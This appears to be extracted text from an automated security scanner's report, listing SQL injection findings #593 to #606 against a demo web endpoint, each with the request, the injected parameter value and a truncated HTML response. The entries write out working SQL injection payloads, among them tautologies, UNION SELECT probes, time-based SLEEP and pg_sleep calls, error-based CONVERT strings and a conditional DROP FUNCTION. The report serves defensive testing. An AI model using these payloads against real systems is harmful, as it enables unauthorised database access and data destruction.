Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #593\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io admin\" or \"1\"=\"1\"/*\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #594\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io UNION ALL SELECT 'INJ'||'ECT'||'XXX',\n2,3,4,5,6,7,8,9,10,11,12#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #595Scan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.ioORDER BY 1--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #596\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A\n')),4,5,6,7,8--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #597\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.ioadmin\" or \"1\"=\"1\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #598\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/Request GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.ioUNION ALL SELECT \n1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29\n--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title>\nDeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script language=\n\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER__\"; </\nscript> <!-- Start of Zendesk Widget script --> <!-- <script id=\"ze-snippet\"\nsrc=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-9a0a-4c32-aed4-\nbfb86b515320\"> </script> --> <!-- End of Zendesk Widget script --> <!-- \nBootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/png\" href=\"data:\nimage/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZSBJ\nbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCgAQ\nIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary \nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #599\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.ioAND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+\nCHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+\nCHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)))#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZSBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #600\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io UNION ALL SELECT 1,2,3,4,5,6,7,8,9\n--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #601\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GETModified \nParametersName Value\ndemouser@deepfence.io IF(7423=7423) SELECT 7423 ELSE DROP \nFUNCTION xcjl--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #602\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.ioAND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+\nCHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(\n88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+CHAR(116)\n+CHAR(69)+CHAR(65)+CHAR(113)+CHAR(112)+CHAR(106)+\nCHAR(107)+CHAR(113)))#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/z8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #603\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.ioUNION ALL SELECT \n1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #604\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified Name ValueParameters demouser@deepfence.io \") or pg_sleep(5)--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #605\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(\n88)+CHAR(88)+CHAR(88)))#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@deepfence.io\nCWE-ID CWE-89\nIssue Number #606\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('\nA')),4,5,6#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" 